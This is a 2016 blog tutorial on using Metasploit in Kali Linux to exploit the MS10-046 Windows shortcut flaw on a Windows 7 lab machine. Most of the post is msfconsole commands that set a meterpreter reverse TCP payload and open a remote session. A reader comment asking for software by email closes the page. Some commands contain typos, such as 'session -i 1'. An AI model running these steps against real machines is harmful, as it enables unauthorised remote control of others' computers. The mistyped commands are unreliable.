Wednesday, 7 December 2016

Pen Testing Win 7 using Metasploit in Kali Linux


Hack Win 7 using Metasploit with step by step tutorials 



Exploiting a Windows vulnerability to logging 
into the system with out username and password by using Metasploit.

Requirements:

1. MetaSploit(any Kali Linux Distribution).

2. Ruby Installed (Install all the package of Ruby to avoid any issues).

3. Two OS running either on same as virtual or physically different.

4. Target host must not be running any AV.

Machine 1: Host Kali Linux Machine

Machine 2: Target Windows 7 Machine

Launch msfconsole - type "msfconsole" in the Terminal

#msfconsole

Now when you get the msf prompt type the below command and look for the module 

exploit/windows/browser/ms10_046_shortcut_icon_dllloader.

Here above  module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain an icon resource pointing to a malicious DLL.This module creates a WebDAV service that can be used to run an arbitrary payload when accessed as a UNC path.

Now once we have found the desired module we will use this exploit by typing the below command.

#msf > use  exploit/windows/browser/ms10_046_shortcut_icon_dllloader

Now once the exploit is loaded we will set the payload for the above select exploit. In our scenario will be using reverse TCP payload. Type the below command to set payload.

#msf > set payload windows/meterpreter/reverse_tcp

Now its time to do some configuration for the exploit/payload that we have just set. type the given command

#msf > show options

Now we have to set the local host to listen. Type the given below two commands.

#msf > set SRVHOST  192.168.31.20

This will be your HOST IP address running metasploit.

#msf > set LHOST 192.168.31.20
  
This will be also be your HOST IP address running metasploit.

Now check if the above applied configuration is applied.

#msf > show options

Now Finally we will start to exploit. Run the command Exploit.

#msf > exploit

Once executed we should “Server Started” (Make sure that your server is not running any web service on port 80)

On any Client machine simply open Internet Explorer and try to open http://192.168.31.20 

Note: it will give your a pop-up asking from permission click ALLOW and Make sure you do not have any AntiVirus running on the target PC.

You can check the number of successful connected session by running the command sessons in msf console.

Now as we can see that we have one victim connected its time to login to the system. run the command session -i 1.

#meterpeter > session -i 1

Once connected type linux command to browse inside the System and have full control on it.

1 comment:

  1. can you sent me kali linux sofeware...and step by step...sent at my email...matyus89@gmail.com...sorry..i bigginer..

    ReplyDelete